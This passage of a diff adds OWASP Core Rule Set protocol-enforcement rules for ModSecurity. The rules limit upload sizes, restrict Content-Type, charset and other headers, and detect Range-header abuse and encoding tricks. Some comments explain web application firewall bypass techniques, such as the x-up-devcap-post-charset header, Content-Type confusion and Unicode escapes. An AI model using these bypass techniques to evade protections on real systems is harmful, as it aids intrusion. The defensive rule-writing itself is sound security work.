+ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \
+ "chain"
+ SecRule REQUEST_HEADERS:Content-Length "@gt %{tx.max_file_size}" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Combined file size is limited
+#
+SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \
+ "id:920410,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Total uploaded files size too large',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \
+ "t:none,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+
+#
+# Restrict which
content-types we accept.
+#
+
+# Restrict Content-Type header to established patterns.
+#
+# This provides generic allow list protection against vulnerabilities like
+# Apache Struts Content-Type arbitrary command execution (CVE-2017-5638).
+#
+# Examples of allowed patterns:
+# - text/plain
+# - text/plain; charset="UTF-8"
+# - multipart/form-data; boundary=----WebKitFormBoundary12345
+# - application/soap+xml; charset=utf-8; action="urn:localhost-hwh#getQuestions"
+# - application/*+json
+
+SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \
+ "id:920470,\
+ phase:1,\
+ block,\
+ t:none,t:lowercase,\
+ msg:'Illegal Content-Type header',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# In case Content-Type header can be parsed, check the mime-type against
+# the policy defined in the 'allowed_request_content_type' variable.
+# To change your policy, edit crs-setup.conf and activate rule 900220.
+SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \
+ "id:920420,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Request content type is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.content_type=|%{tx.0}|',\
+ chain"
+ SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \
+ "t:lowercase,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Restrict charset parameter within the content-type header
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \
+ "id:920480,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Request content type charset is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.content_type_charset=|%{tx.1}|',\
+ chain"
+ SecRule TX:content_type_charset "!@within %{tx.allowed_request_content_type_charset}" \
+ "t:lowercase,\
+ ctl:forceRequestBodyVariable=On,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Restrict charset parameter inside content type header to occur max once.
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \
+ "id:920530,\
+ phase:1,\
+ block,\
+ t:none,t:lowercase,\
+ msg:'Multiple charsets detected in content type header',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Restrict protocol versions.
+#
+SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \
+ "id:920430,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'HTTP protocol version is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/6.5.10',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Restrict file extension
+#
+SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \
+ "id:920440,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'URL file extension is restricted by policy',\
+ logdata:'%{TX.0}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/6.5.10',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.extension=.%{tx.1}/',\
+ chain"
+ SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \
+ "t:none,t:urlDecodeUni,t:lowercase,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Backup or "working" file extension
+# example: index.php~, /index.php~/foo/
+#
+SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \
+ "id:920500,\
+ phase:1,\
+ block,\
+ t:none,t:urlDecodeUni,\
+
msg:'Attempt to access a backup or working file',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restricted HTTP headers +# +# -=[ Rule Logic ]=- +# The use of certain headers is restricted. They are listed in two variables: +# - TX.restricted_headers_basic: Known security risks, always forbidden (rule +# 920450) +# - TX.restricted_headers_extended: Possible false positives, possible security +# risks, may be forbidden (rule 920451) +# +# The headers are transformed into lowercase before the match. In order to make +# sure that only complete header names match, the names in the +# TX.restricted_headers_* variables are wrapped in slashes. This guarantees that +# the Range header (which becomes /range/) will not match the restricted +# /content-range/ header, for example. +# +# This is a chained rule, where the first rule fills a set of variables of the +# form TX.header_name__. The second rule is then executed +# for all variables of the form TX.header_name__. +# +# As a consequence of the construction of the rule, the alert message and the +# alert data will not display the original header name Content-Range, but +# /content-range/ instead. +# +# This rule has a stricter sibling, 920451, which matches against the variable +# TX.restricted_headers_extended. It handles deprecated headers that are still +# in use (so false positives are possible, hence unsuitable for blocking in a +# default paranoia level 1 installation) and headers with possible security +# risks. 
+# +# -=[ References ]=- +# https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920450,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920450_/ "@within %{tx.restricted_headers_basic}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Rule against CVE-2022-21907 +# This rule blocks Accept-Encoding headers longer than 50 characters. +# The length of 50 is a heuristic based on the length of values from +# the RFC (https://datatracker.ietf.org/doc/rfc9110/) +# and the respective values assigned by IANA +# (https://www.iana.org/assignments/http-parameters/http-parameters.xml#content-coding). +# +# This rule has a stricter sibling: 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "@gt 50" \ + "id:920520,\ + phase:1,\ + block,\ + t:none,t:lowercase,t:length,\ + msg:'Accept-Encoding header exceeded sensible length',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict response charsets that we allow. 
+# The following rules make sure that the response will be in an ASCII-compatible charset that +# phase 4 rules can properly understand and block. +# + +# +# Some servers rely on the request Accept header to determine what charset to respond with. +# This rule restricts these to familiar charsets. +# +# Regular expression generated from regex-assembly/920600.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920600 +# +SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "id:920600,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept header: charset parameter',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Unicode 
character bypass check for non JSON requests +# See reported bypass in issue: +# https://github.com/coreruleset/coreruleset/issues/2512 +# +SecRule REQBODY_PROCESSOR "!@streq JSON" \ + "id:920540,\ + phase:2,\ + block,\ + t:none,\ + msg:'Possible Unicode character bypass detected',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Disallow any raw URL fragments. The '#' character should be omitted or URL-encoded. +# CRS rules generally do not check REQUEST_URI_RAW, but some servers accept the fragment as part of the URL path/query. +# This creates false negative evasions. +# +SecRule REQUEST_URI_RAW "@contains #" \ + "id:920610,\ + phase:1,\ + block,\ + t:none,\ + msg:'Raw (unencoded) fragment in request URI',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# The following rule (920620) checks for the presence of 2 or more request Content-Type headers. +# Content-Type confusion poses a significant security risk to a web application. It occurs when +# the server and client have different interpretations of the Content-Type header, leading to +# miscommunication, potential exploitation and WAF bypass. +# +# Using Apache, when multiple Content-Type request headers are received, the server combines them +# into a single header with the values separated by commas. 
For example, if a client sends multiple +# Content-Type headers with values "application/json" and "text/plain", Apache will combine them +# into a single header like this: "Content-Type: application/json, text/plain". +# +# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each +# header as a separate entity without combining them. So, if a client sends multiple Content-Type +# headers, Nginx will keep them separate, maintaining the original values. +# +SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ + "id:920620,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple Content-Type Request Headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# +# -=[ Rule Logic ]=- +# +# Check the number of range fields in the Range request header. +# +# An excessive number of Range request headers can be used to DoS a server. +# The original CVE proposed an arbitrary upper limit of 5 range fields. +# +# Several clients are known to request PDF fields with up to 62 range +# fields. Therefore the standard rule does not cover PDF files. This is +# performed in two separate (stricter) siblings of this rule. 
+# +# 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs +# 920201: PL2: Limit of 62 range header fields for PDFs +# 920202: PL4: Limit of 5 range header fields for PDFs +# +# -=[ References ]=- +# https://httpd.apache.org/security/CVE-2011-3192.txt + + +SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "id:920200,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BASENAME "!@endsWith .pdf" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +# +# This is a sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920201,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (63 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ + "id:920230,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multiple URL Encoding Detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/120',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + 
+ +# +# PL2: This is a stricter sibling of 920270. +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ + "id:920271,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (non printable characters)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# Missing User-Agent Header +# +# -=[ Rule Logic ]=- +# This rules will check to see if there is a User-Agent header or not. +# + +SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ + "id:920320,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Missing User Agent Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920120. +# +SecRule FILES_NAMES|FILES "@rx ['\";=]" \ + "id:920121,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempted multipart/form-data bypass',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: Block on Missing Content-Type Header with Request Body +# This is a stricter sibling of rule 920340. 
+# +# -=[ References ]=- +# http://httpwg.org/specs/rfc7231.html#header.content-type + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ + "id:920341,\ + phase:1,\ + block,\ + t:none,\ + msg:'Request Containing Content Requires Content-Type header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920450. +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920451,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920451_/ "@within %{tx.restricted_headers_extended}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# +# PL 3: This is a stricter sibling of 920270. 
Ascii range: Printable characters in the low range +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ + "id:920272,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of printable chars below ascii 127)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# Missing Accept Header +# +# This rule has been moved to PL3 +# +# -=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# RFC 7231 does not enforce the use of the Accept header. +# It is just typical browser behavior to send and it can indicate a malicious client. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests, CONNECT requests, and requests coming from known +# offending User-Agents via two chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. 
+# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}'" + + +# +# PL3: The little known x-up-devcap-post-charset request header can be used to submit +# a request with a different encoding as an alternative to the charset parameter in +# the Content-Type header. This can be used to circumvent charset restrictions on +# the Content-Type header in ASP.NET. +# Note that this only works in combination with a User-Agent prefix. +# +# This rule is based on a blog post by Soroush Dalili at +# https://soroush.me/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ +# +SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ + "id:920490,\ + phase:1,\ + block,\ + t:none,\ + msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'language-aspnet',\ + tag:'platform-windows',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# Cache-Control Request Header allow list +# +# -=[ Rule Logic ]=- +# This rule aims to strictly allow list the Cache-Control request header +# values and to blocks all violations. 
This should be useful to intercept +# "bad bot" and tools that impersonate a real browser but with wrong request +# header setup. +# +# The regular expression used on this rule tries to match multiple directives +# in a single value, for example: "max-stale=1, max-age=2". This leads us to +# use a regular expression that accepts a trailing comma to keep compatibility +# with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, " +# +# Moreover, this regular expression allows duplicate directives sequence like: +# "max-stale, max-stale=1, no-cache, no-cache". +# +# Standard Cache-Control directives that can be used by the client: +# - max-age= +# - max-stale[=] +# - min-fresh= +# - no-cache +# - no-store +# - no-transform +# - only-if-cached +# +# References: +# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control +# - https://regex101.com/r/CZ0Hxu/22 +# +SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ + "id:920510,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid Cache-Control request header',\ + logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'header-allowlist',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# This rule checks for valid Accept-Encoding headers +# +# This rule has a less strict sibling: 920520 +# +# Regular expression generated from regex-assembly/920521.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?gzip|identity|\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)" \ + "id:920521,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept-Encoding header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + +# +# This is a stricter sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920202,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + 